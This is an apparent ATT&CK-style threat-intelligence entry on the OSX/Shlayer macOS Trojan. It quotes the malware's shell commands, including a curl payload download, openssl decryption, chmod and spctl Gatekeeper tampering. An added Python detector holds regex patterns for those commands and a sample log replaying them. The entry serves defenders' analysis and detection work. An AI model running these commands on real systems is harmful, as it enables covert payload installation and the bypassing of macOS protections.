S0402 OSX/Shlayer
OSX/Shlayer is a Trojan, first discovered in 2018, that is designed to install adware on macOS.[1][2]
Item | Value |
---|---|
ID | S0402 |
Associated Names | Zshlayer, Crossrider |
Type | MALWARE |
Version | 1.3 |
Created | 29 August 2019 |
Last Modified | 19 October 2022 |
Associated Software Descriptions
Name | Description |
---|---|
Zshlayer | [3] |
Crossrider | [5][4] |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
enterprise | T1548 | Abuse Elevation Control Mechanism | - |
enterprise | T1548.004 | Elevated Execution with Prompt | OSX/Shlayer can escalate privileges to root by asking the user for credentials.[1] |
enterprise | T1176 | Browser Extensions | OSX/Shlayer can install malicious Safari browser extensions to serve ads.[5][4] |
enterprise | T1059 | Command and Scripting Interpreter | - |
enterprise | T1059.004 | Unix Shell | OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command `sh -c tail -c +1381…` to extract bytes at an offset from a specified file, and the command `curl -fsL "$url" >$tmp_path` to download malicious payloads into a temporary directory.[1][3][6][9] |
enterprise | T1140 | Deobfuscate/Decode Files or Information | OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads.[1] Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.[3][6] |
enterprise | T1083 | File and Directory Discovery | OSX/Shlayer has used the commands `appDir="$(dirname $(dirname "$currentDir"))"` and `$(dirname "$(pwd -P)")` to construct installation paths.[3][6] |
enterprise | T1222 | File and Directory Permissions Modification | - |
enterprise | T1222.002 | Linux and Mac File and Directory Permissions Modification | OSX/Shlayer can use the chmod utility to set a file as executable, such as `chmod 777` or `chmod +x`.[6][1][10] |
enterprise | T1564 | Hide Artifacts | OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as `export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"` or `mktemp -t Installer`.[3][6][10] |
enterprise | T1564.001 | Hidden Files and Directories | OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.[1] |
enterprise | T1564.009 | Resource Forking | OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal and Finder, potentially evading traditional scanners.[7][8] |
enterprise | T1105 | Ingress Tool Transfer | OSX/Shlayer can download payloads and extract bytes from files. OSX/Shlayer uses the command `curl -fsL "$url" >$tmp_path` to download malicious payloads into a temporary directory.[1][3][6][9] |
enterprise | T1036 | Masquerading | - |
enterprise | T1036.005 | Match Legitimate Name or Location | OSX/Shlayer can masquerade as a Flash Player update.[1][2] |
enterprise | T1553 | Subvert Trust Controls | - |
enterprise | T1553.001 | Gatekeeper Bypass | If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer samples have also been notarized by Apple, allowing them to pass additional Gatekeeper checks.[1][10][9] |
enterprise | T1082 | System Information Discovery | OSX/Shlayer has collected the IOPlatformUUID, the session UID, and the OS version using the command `sw_vers -productVersion`.[1][3] |
enterprise | T1204 | User Execution | - |
enterprise | T1204.002 | Malicious File | OSX/Shlayer has relied on users mounting and executing a malicious DMG file.[1][2] |
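The shell commands listed in the table above are what a defender would hunt for in process-execution telemetry. The following added example (not part of the ATT&CK page or any vendor's detection content) maps command lines from a constructed log to the technique IDs on this page and only flags a user session when several distinct techniques from the chain appear together; the log format, the sample lines and the spctl flags matched are assumptions.

```python
import re
# Added example (not from the ATT&CK page or any vendor): map command lines from a
# process-execution log to the OSX/Shlayer behaviours this page documents. The log
# format and sample lines are constructed; spctl flags are assumed, not from the page.
SHLAYER_INDICATORS = [
    (r"\bcurl\s+-fsL\b.*>\s*\$?\w*tmp\w*", "T1105", "curl download to temp path"),
    (r"\btail\s+-c\s+\+\d+", "T1059.004", "extract bytes at an offset with tail"),
    (r"\bopenssl\s+enc\b.*\s-d\b", "T1140", "openssl decrypt of staged payload"),
    (r"\bmktemp\s+(-d\s+/tmp/X+|-t\s+\w+)", "T1564", "random temp name via mktemp"),
    (r"\bchmod\s+(777|\+x)\b", "T1222.002", "dropped file marked executable"),
    (r"\bspctl\b.*--(add|disable|master-disable)\b", "T1553.001", "Gatekeeper tampering"),
    (r"\bsw_vers\s+-productVersion\b", "T1082", "macOS version discovery"),
    (r'\bdirname\s+"?\$\(pwd\s+-P\)', "T1083", "install path derived from script dir"),
]
LOG_RE = re.compile(r"user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

SAMPLE_LOG = """\
2022-10-19T10:01:02 pid=4311 user=alice cmd=export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
2022-10-19T10:01:03 pid=4312 user=alice cmd=sw_vers -productVersion
2022-10-19T10:01:04 pid=4313 user=alice cmd=curl -fsL "$url" >$tmp_path
2022-10-19T10:01:05 pid=4314 user=alice cmd=sh -c tail -c +1381 /Volumes/Install/.hidden/Installer.command
2022-10-19T10:01:06 pid=4315 user=alice cmd=openssl enc -aes-256-cbc -d -base64 -in $tmp_path
2022-10-19T10:01:07 pid=4316 user=alice cmd=chmod +x /tmp/XXXXXXXXXXXX/Installer
2022-10-19T10:02:00 pid=4400 user=bob cmd=ls -la /Users/bob
"""

def scan(log_text):
    """Return (line_no, user, technique_id, why) for every command matching an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        for pattern, tid, why in SHLAYER_INDICATORS:
            if re.search(pattern, m["cmd"]):
                hits.append((n, m["user"], tid, why))
    return hits

def assess(log_text, min_techniques=3):
    """Flag users whose session shows several distinct techniques from the chain;
    any one hit alone (chmod +x, mktemp) is far too common on a developer Mac."""
    per_user = {}
    for _, user, tid, _ in scan(log_text):
        per_user.setdefault(user, set()).add(tid)
    return {u: sorted(t) for u, t in per_user.items() if len(t) >= min_techniques}

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d user=%s %s: %s" % hit)
    print("flagged:", assess(SAMPLE_LOG))
```

Run against the constructed log, `alice` is flagged with six techniques while `bob`'s single `ls` produces no hit; tune `min_techniques` to the noise level of your own fleet.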
References
1. Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
2. Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.
3. Stokes, Phil. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.
4. Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.
5. Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.
6. Stokes, Phil. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
7. Noerenberg, Erika. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.
8. Stokes, Phil. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.
9. Wardle, Patrick. (2020, August 30). Apple Approved Malware: malicious code …now notarized!? #2020. Retrieved September 13, 2021.
10. Bradley, Jaron. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.